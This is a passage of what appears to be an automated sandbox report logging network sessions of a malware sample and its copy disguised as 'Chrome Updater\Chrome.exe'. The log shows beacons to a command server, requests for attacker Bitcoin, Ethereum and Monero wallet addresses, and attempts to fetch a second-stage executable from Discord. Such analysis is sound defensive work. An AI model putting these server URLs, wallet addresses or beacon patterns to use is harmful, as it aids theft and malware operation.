                                                                                    2024-01-04 07:30:26 UTC967INData Raw: 33 62 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 30 32 2e 31 36 35 2e 34 38 2e 35 32 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 44 69 73
                                                                                    Data Ascii: 3bb<?xml version="1.0" encoding="UTF-8"?><query><ip>102.165.48.52</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Dis


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.649754104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:26 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:26 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4nUIwgTrfR9X6PeDdHXpMCr7Vhamah75RyDgBysHdshwGANiYcSf%2BuZTRMY353920ymSOF8yNgq%2Fnke9qfKm%2B45Sx27kDBc8FAlWLvdWed%2FJVDAk1SfdZMZ%2ByqXPu6RNbtmq%2F%2BlY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6b21e842898-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:26 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.649755104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:26 UTC101OUTGET /getwallet.php?id=1081&wallet=btc HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:27 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xXEkFPLc3YVS3fwLsizv8csyLkJytlXo4X3CtT0XQS8Prsfmv%2FDSjz0S%2FWikEbTO4NxbWOJdyXEBPCvJ3ayeW58KMhem31jc239%2FGsidQuV8hfzUPJWS3SFbmLZVQexhv1Uc4zuA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6b598ce3b72-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:27 UTC48INData Raw: 32 61 0d 0a 62 63 31 71 38 30 38 72 70 74 7a 37 6a 70 72 61 76 79 6b 32 79 36 6b 6a 33 71 79 37 6a 37 75 6d 71 61 37 68 74 79 6a 6b 38 33 0d 0a
                                                                                    Data Ascii: 2abc1q808rptz7jpravyk2y6kj3qy7j7umqa7htyjk83
                                                                                    2024-01-04 07:30:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.649756104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:26 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:27 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jQQflNT3lo%2FejPbA9W9BM175bgKO0wuNqZKR8x6LvRbTqr56o%2FQdN%2FXr9VCLBCiplMVQhOcjqsJkRcsPLxK%2Fifz3iz0avoNalbq0iEKdOcnintnk9eJnE96%2FpJ52vmcJucCyrCpb"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6b5ac161fec-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:27 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.649757162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:26 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:27 UTC1332INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:27 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6b69cf48280-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:27 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=OwScDxgM4jQr6OD0le7AbPAW1T9ZhbkGfarCo2Gg1Rg-1704353427-1-AfPtQix6MJDxhMqJanDlhYFoKwOV9N4i3ZG7X0WG2YIZ9TQM7Ra4vkTs3Jds+FKnNU8vgebfa5BLf5au2j9fyYI=; path=/; expires=Thu, 04-Jan-24 08:00:27 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FgBHKD%2FaMnh9BVnqbFyBKPoCiZeeTn%2BDJkRwEyolAo620ysdUAmB2KVvaH2eAtwOUImiT7apxA20tT4VDlJn5t6tqhJdjIb0v3xwxqe137IPpCgRH1B6shjJHuU45BvBEJ1zzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=5JkOE1u70cjpLVz52_JgpK2bYeNQQxvrybFWm7hS4HI-1704353427116-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:27 UTC37INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?
                                                                                    2024-01-04 07:30:27 UTC199INData Raw: 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.649758104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:27 UTC77OUTGET /getwallet.php?id=1081&wallet=eth HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:27 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iJmxJTr%2FH77xkg0hADn0tdywCKCW76cLiW92wy53Hlmw3wsPuQeS%2FD%2BXj9ZXnSPPmEaIbMOhl2nfS0DM%2BHuxcIibVBvCPRl1kub6HzrSDFuBdgUfyf%2BGyp5MXj93g2VEavmA6rxE"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6ba4fe05a82-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:27 UTC48INData Raw: 32 61 0d 0a 30 78 37 66 32 42 62 46 37 44 32 34 65 66 39 33 30 66 63 33 62 30 45 32 39 43 37 33 35 65 38 65 65 30 33 31 31 46 66 36 46 65 0d 0a
                                                                                    Data Ascii: 2a0x7f2BbF7D24ef930fc3b0E29C735e8ee0311Ff6Fe
                                                                                    2024-01-04 07:30:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.649759104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:27 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:27 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E5kotFVWpkV9o%2Bw68a7SwqKsSst997nANHPwS4XjWXDRrFtc5G09sYv4wDfBRCtjkqyb01P6XU2YymTMFwOSK59%2FMNykQY%2BojCRlXcFgImXuiO%2BN1vJZiPLXOKBZJJ8yMEe5cKtc"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6bae8dd07e9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:27 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.649760104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:29 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:29 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8hrwJb6dDte1yDqiGAbkzjl%2F7ibcFHj39q%2BtZ4%2BmfKpWKB78A48TlCmDJajx02oStaL45QJwYX%2FK14boUZoMLejCKO1sSX5FsywMut7lSeiFYGpA2ew0fHQffsBY1JmvmisiQH2q"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6c4aa23398b-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:29 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.649762104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:29 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:29 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZYr8Ddt9vZipdGqffVqQvfeE4o9Vhmd3FXkKASLY%2BduMSi2S%2BEHpjl8j6DBxB93Kbox%2FQoKc1zsWJ4IPyQMzW2cuhACedahow%2BN1CYkS8ANh0lBZgqpHhwN07mxBf%2FDMVBQKh6wa"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6c6ddd38029-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:29 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.649761104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:29 UTC77OUTGET /getwallet.php?id=1081&wallet=xmr HTTP/1.1
                                                                                    Host: central-cee-doja.ru


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.649763162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:29 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:30 UTC1329INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:30 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6ca1a2f0605-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:30 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSs
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=0uHQcGFjsTHtnJC8ikBQVuwN16VxgvZiAOjDLyVL_Ag-1704353430-1-AcMmeNleLc5hQznSNHZuQ7/gnQE/WlC9QGWtSbENv0/Nkkdr/i6ElegYmSMC6P/qOoJNoBSil6rNHXfHrrPMRpc=; path=/; expires=Thu, 04-Jan-24 08:00:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgmzglu9EPZ8N7mK5yJRoRPN9wWK7Tpq8QiUGaeq91O%2FNHPpHtgRzNmavQu7FlxrQx1tug%2BBDTP%2FUnZVEukZOWBNSmBP3NGt19xezpdZlHSv2%2BB%2BhKmS6RPRiOkGeHR8PHJ1Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=_j72t_naITz4v0ijOf9.UNvWczbv4tDXRVUJQIwJlWI-1704353430165-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:30 UTC40INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><E
                                                                                    2024-01-04 07:30:30 UTC196INData Raw: 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: rror><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.649764162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:30 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:30 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:30 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6cb2f25062f-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 14
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:30 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=mfKDSsPLX6vhdFC6Fex2DhKwXEmQcQ_6L7aKKJB6lkY-1704353430-1-AcLCEG+3cjPP+qMw91lK39DVjTTjp1EI7Ky9B/NUQk/dOO3j48mQ0b+2ladLktmHrNdgIBapmOmOfM59k/0NlXA=; path=/; expires=Thu, 04-Jan-24 08:00:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qilDxijVGRacnNQJFoNC%2BbhAnHvB8NZaDCVWDHciPOXx5h02oPpg8D%2FD2uv%2BbMuL72RaFBdTq4L1FTykoAitpmJajIWZzZotpsgTQMYPBlDoqIfk%2BMvrjtbcR8c0ZMJeJ9SBjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=reHgxWgHmFJDoT7lfs6iV7jmgWsy._EBy4VFIiMjfS8-1704353430297-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:30 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:30:30 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.649765104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:30 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:31 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gcn%2F0to5KvACgL2nXwPc8lTuPbCuXtOYIagkIOAHxfYKu%2BeiXOxokxOxyp5RnjAOokodyj%2B7PaW2SwLoDqtYMxsXZcN%2FFsmFMI49eIEEcwsHmAKBE4jha1BhvQTZD8TA9oDRf%2B0E"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6cdfea720ab-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:31 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.649766104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:30 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:31 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
